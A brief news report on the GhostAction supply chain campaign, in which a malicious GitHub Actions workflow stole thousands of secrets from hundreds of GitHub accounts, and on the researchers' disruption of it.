A major supply chain attack on GitHub, known as the “GhostAction” campaign, has resulted in the theft of 3,325 secrets from 327 compromised GitHub accounts. Security researchers from GitGuardian discovered the attack after a project called FastUUID was found to be compromised. The attacker had used the maintainer’s broken-into account to publish a malicious GitHub Actions workflow, specifically designed to steal sensitive information like PyPI and npm keys, AWS credentials, DockerHub tokens, Cloudflare keys, and more.
The malicious workflow, disguised as an “Add Github Actions Security workflow,” aimed to silently siphon off secrets from affected repositories. After GitGuardian raised the alarm, affected projects were notified, commits were rolled back where possible, and the exfiltration server was taken offline—successfully disrupting the attacker’s campaign.
The investigation revealed that out of 817 affected repositories, 100 had already removed the malicious changes when notified, while the researchers managed to alert most of the rest except a handful where issues or repositories were deleted.
At the same time, another supply chain attack—called S1ngularity—struck over 2,000 GitHub accounts and leaked thousands of secrets, but this was found to be unrelated to GhostAction after further review.
These incidents highlight the ongoing risks in open-source supply chains, reinforcing the need for developers to protect secrets and closely monitor third-party integrations.
